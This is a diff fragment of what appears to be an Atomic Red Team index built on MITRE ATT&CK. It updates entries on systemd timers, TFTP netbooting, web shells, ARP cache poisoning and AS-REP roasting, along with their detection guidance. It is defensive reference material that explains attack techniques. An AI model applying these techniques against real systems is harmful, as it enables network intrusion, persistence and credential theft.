+16488,6 @@ persistence: url: https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang description: Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019. - - source_name: gist Arch package compromise 10JUL2018 - url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public - Arch package compromise. Retrieved April 23, 2019. - - source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 - url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux - AUR Package Repository. Retrieved April 23, 2019. - - source_name: acroread package compromised Arch Linux Mail 8JUL2018 - url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved - April 23, 2019. - source_name: Rapid7 Service Persistence 22JUNE2016 url: https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence description: Rapid7. (2016, June 22). Service Persistence. Retrieved April @@ -16011,7 +16498,7 @@ persistence: phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-25T22:13:59.473Z' + modified: '2020-10-09T13:46:29.701Z' created: '2020-01-17T16:15:19.870Z' x_mitre_platforms: - Linux @@ -16025,7 +16512,7 @@ persistence: - User - root x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.2' x_mitre_data_sources: - Process command-line parameters - Process monitoring @@ -16100,6 +16587,137 @@ persistence: rm -rf #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload name: bash + T1053.006: + technique: + id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21 + description: |- + Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) + + Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/. + + An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence. + name: Systemd Timers + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1053.006 + url: https://attack.mitre.org/techniques/T1053/006 + - source_name: archlinux Systemd Timers Aug 2020 + url: https://wiki.archlinux.org/index.php/Systemd/Timers + description: archlinux. (2020, August 11). systemd/Timers. Retrieved October + 12, 2020. + - source_name: 'Linux man-pages: systemd January 2014' + url: http://man7.org/linux/man-pages/man1/systemd.1.html + description: Linux man-pages. (2014, January). systemd(1) - Linux manual page. + Retrieved April 23, 2019. + - description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux + AUR Package Repository. Retrieved April 23, 2019. + url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/ + source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018 + - description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public + Arch package compromise. Retrieved April 23, 2019. + url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a + source_name: gist Arch package compromise 10JUL2018 + - description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved + April 23, 2019. + url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html + source_name: acroread package compromised Arch Linux Mail 8JUL2018 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-10-14T15:20:00.754Z' + created: '2020-10-12T17:50:31.584Z' + x_mitre_platforms: + - Linux + x_mitre_contributors: + - SarathKumar Rajendran, Trimble Inc + x_mitre_data_sources: + - File monitoring + - Process monitoring + - Process command-line parameters + x_mitre_detection: |- + Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. + + Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables. + + Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020) + x_mitre_permissions_required: + - User + - root + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] + T1542.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1542.005 + url: https://attack.mitre.org/techniques/T1542/005 + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Secure Boot + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure + Boot. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Image File Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Image File Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Command History + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command + History. Retrieved October 21, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Boot Information + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot + Information. Retrieved October 21, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: TFTP Boot + description: |- + Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. + + Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks) + id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-10-22T16:35:53.806Z' + created: '2020-10-20T00:06:56.180Z' + x_mitre_data_sources: + - Network device run-time memory + - Network device command history + - Network device configuration + - File monitoring + - Network device logs + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) + + Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Network + atomic_tests: [] T1547.003: technique: external_references: @@ -16177,6 +16795,8 @@ persistence: Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. + + On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. external_references: - source_name: mitre-attack external_id: T1205 @@ -16185,6 +16805,18 @@ persistence: description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.' source_name: Hartrell cd00r 2002 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: FireEye - Synful Knock + url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html + description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful + Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern @@ -16195,7 +16827,7 @@ persistence: phase_name: persistence - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-07-01T18:27:41.755Z' + modified: '2020-10-21T15:30:44.964Z' created: '2018-04-18T17:59:24.739Z' x_mitre_contributors: - Josh Day, Gigamon @@ -16208,12 +16840,13 @@ persistence: - Linux - macOS - Windows + - Network x_mitre_network_requirements: true x_mitre_detection: Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. x_mitre_defense_bypassed: - Defensive network service scanning - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_is_subtechnique: false atomic_tests: [] T1505.002: @@ -16388,13 +17021,8 @@ persistence: name: sh T1078: technique: - id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Valid Accounts - description: |- - Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. - - The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078 @@ -16410,8 +17038,13 @@ persistence: description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. source_name: TechNet Audit Policy - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + description: |- + Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. + + The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + name: Valid Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -16422,13 +17055,31 @@ persistence: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-06-20T22:44:36.043Z' + modified: '2020-10-19T16:01:22.724Z' created: '2017-05-31T21:31:00.645Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Netskope - - Mark Wee - - Praetorian + x_mitre_version: '2.1' + x_mitre_data_sources: + - AWS CloudTrail logs + - Stackdriver logs + - Authentication logs + - Process monitoring + x_mitre_defense_bypassed: + - Firewall + - Host intrusion prevention systems + - Network intrusion detection system + - Application control + - System access controls + - Anti-virus + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_effective_permissions: + - User + - Administrator x_mitre_platforms: - Linux - macOS @@ -16439,48 +17090,21 @@ persistence: - SaaS - Office 365 - Azure AD - x_mitre_effective_permissions: - - User - - Administrator - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. - x_mitre_defense_bypassed: - - Firewall - - Host intrusion prevention systems - - Network intrusion detection system - - Application control - - System access controls - - Anti-virus - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_version: '2.1' + x_mitre_contributors: + - Netskope + - Mark Wee + - Praetorian + x_mitre_is_subtechnique: false atomic_tests: [] T1505.003: technique: - external_references: - - source_name: mitre-attack - external_id: T1505.003 - url: https://attack.mitre.org/techniques/T1505/003 - - url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html - description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down - the China Chopper Web Shell - Part I. Retrieved March 27, 2015. - source_name: Lee 2013 - - url: https://www.us-cert.gov/ncas/alerts/TA15-314A - description: US-CERT. (2015, November 13). Compromised Web Servers and Web - Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. - source_name: US-CERT Alert TA15-314A Web Shells - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Web Shell + created: '2019-12-13T16:46:18.927Z' + modified: '2020-09-16T19:34:19.752Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb description: "Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server @@ -16489,21 +17113,34 @@ persistence: addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) " - id: attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-04-17T17:47:56.673Z' - created: '2019-12-13T16:46:18.927Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_system_requirements: - - Adversary access to Web server with vulnerability or account to upload and - serve the Web shell file. - x_mitre_permissions_required: - - SYSTEM - - User + name: Web Shell + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1505.003 + url: https://attack.mitre.org/techniques/T1505/003 + - external_id: CAPEC-650 + source_name: capec + url: https://capec.mitre.org/data/definitions/650.html + - source_name: Lee 2013 + description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down + the China Chopper Web Shell - Part I. Retrieved March 27, 2015. + url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html + - url: https://www.us-cert.gov/ncas/alerts/TA15-314A + description: US-CERT. (2015, November 13). Compromised Web Servers and Web + Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. + source_name: US-CERT Alert TA15-314A Web Shells + x_mitre_platforms: + - Linux + - Windows + - macOS + x_mitre_data_sources: + - Process monitoring + - Netflow/Enclave netflow + - File monitoring + - Authentication logs x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. @@ -16517,15 +17154,14 @@ persistence: Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) " - x_mitre_data_sources: - - Process monitoring - - Netflow/Enclave netflow - - File monitoring - - Authentication logs - x_mitre_platforms: - - Linux - - Windows - - macOS + x_mitre_permissions_required: + - SYSTEM + - User + x_mitre_system_requirements: + - Adversary access to Web server with vulnerability or account to upload and + serve the Web shell file. + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' identifier: T1505.003 atomic_tests: - name: Web Shell Written to Disk @@ -16708,6 +17344,15 @@ persistence: - source_name: mitre-attack external_id: T1543.003 url: https://attack.mitre.org/techniques/T1543/003 + - external_id: CAPEC-478 + source_name: capec + url: https://capec.mitre.org/data/definitions/478.html + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html - url: https://technet.microsoft.com/en-us/library/cc772408.aspx description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. source_name: TechNet Services @@ -16729,12 +17374,12 @@ persistence: phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-25T22:22:10.041Z' + modified: '2020-09-16T15:49:58.490Z' created: '2020-01-17T19:13:50.402Z' x_mitre_platforms: - Windows x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_detection: "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are @@ -17081,6 +17726,166 @@ credential-access: ' name: sh + T1557.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1557.002 + url: https://attack.mitre.org/techniques/T1557/002 + - source_name: RFC826 ARP + url: https://tools.ietf.org/html/rfc826 + description: Plummer, D. (1982, November). An Ethernet Address Resolution + Protocol. Retrieved October 15, 2020. + - source_name: Sans ARP Spoofing Aug 2003 + url: https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411 + description: Siles, R. (2003, August). Real World ARP Spoofing. Retrieved + October 15, 2020. + - source_name: Cylance Cleaver + description: Cylance. (2014, December). Operation Cleaver. Retrieved September + 14, 2017. + url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: ARP Cache Poisoning + description: | + Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). + + The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache. + + An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment. + + The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver) + + Adversaries may use ARP cache poisoning as a means to man-in-the-middle (MiTM) network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003) + id: attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-10-16T15:22:11.604Z' + created: '2020-10-15T12:05:58.755Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous + ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches + across endpoints for signs of ARP poisoning. For example, if multiple IP addresses + map to a single MAC address, this could be an indicator that the ARP cache + has been poisoned." + x_mitre_data_sources: + - Packet capture + - Netflow/Enclave netflow + x_mitre_contributors: + - Jon Sternstein, Stern Security + x_mitre_platforms: + - Linux + - Windows + - macOS + atomic_tests: [] + T1558.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1558.004 + url: https://attack.mitre.org/techniques/T1558/004 + - source_name: Harmj0y Roasting AS-REPs Jan 2017 + url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/ + description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August + 24, 2020. + - source_name: Microsoft Kerberos Preauth 2014 + url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx + description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why + It Should Not Be Disabled. Retrieved August 25, 2020.' + - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019 + url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/ + description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords + with AS-REP Roasting. Retrieved August 24, 2020. + - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the + Guard Dog of Hades. Retrieved March 22, 2018. + source_name: SANS Attacking Kerberos Nov 2014 + url: https://redsiege.com/kerberoast-slides + - url: https://adsecurity.org/?p=2293 + description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets + Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory + Domain. Retrieved March 22, 2018. + source_name: AdSecurity Cracking Kerberos Dec 2015 + - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/ + description: Bani, M. (2018, February 23). Detecting Kerberoasting activity + using Azure Security Center. Retrieved March 23, 2018. + source_name: Microsoft Detecting Kerberoasting Feb 2018 + - source_name: Microsoft 4768 TGT 2017 + url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768 + description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication + ticket (TGT) was requested. Retrieved August 24, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: AS-REP Roasting + description: "Adversaries may reveal credentials of accounts that have disabled + Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) + Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication + offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). + When enabled, a user requesting access to a resource initiates communication + with the Domain Controller (DC) by sending an Authentication Server Request + (AS-REQ) message with a timestamp that is encrypted with the hash of their + password. If and only if the DC is able to successfully decrypt the timestamp + with the hash of the user’s password, it will then send an Authentication + Server Response (AS-REP) message that contains the Ticket Granting Ticket + (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: + Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication, + an adversary may send an AS-REQ message without the encrypted timestamp and + receive an AS-REP message with TGT data which may be encrypted with an insecure + algorithm such as RC4. The recovered encrypted data may be vulnerable to offline + [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks + similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) + and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan + 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account + registered to a domain, with or without special privileges, can be abused + to list all domain accounts that have preauthentication disabled by utilizing + Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) + with an LDAP filter. Alternatively, the adversary may send an AS-REQ message + for each user. If the DC responds without errors, the account does not require + preauthentication and the AS-REP message will already contain the encrypted + data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits + Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), + [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral + Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: + SANS Attacking Kerberos Nov 2014)" + id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2020-10-20T19:30:11.783Z' + created: '2020-08-24T13:43:00.028Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_system_requirements: + - Valid domain account + x_mitre_permissions_required: + - User + x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos + TGS service ticket requests. Particularly investigate irregular patterns of + activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within + a small time frame, especially if they also request RC4 encryption [Type 0x17], + pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking + Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: + Microsoft 4768 TGT 2017)' + x_mitre_data_sources: + - Windows event logs + - Authentication logs + x_mitre_contributors: + - James Dunn, @jamdunnDFW, EY + - Swapnil Kumbhar + - Jacques Pluviose, @Jacqueswildy_IT + - Dan Nutting, @KerberToast + x_mitre_platforms: + - Windows + atomic_tests: [] T1552.003: technique: external_references: @@ -17183,7 +17988,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-07-09T17:01:18.302Z' + modified: '2020-10-21T16:38:27.781Z' created: '2017-05-31T21:31:22.767Z' x_mitre_platforms: - Linux @@ -17304,7 +18109,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-03-25T18:18:20.366Z' + modified: '2020-10-15T19:39:34.817Z' created: '2020-02-11T18:47:46.619Z' x_mitre_contributors: - Praetorian @@ -17317,7 +18122,7 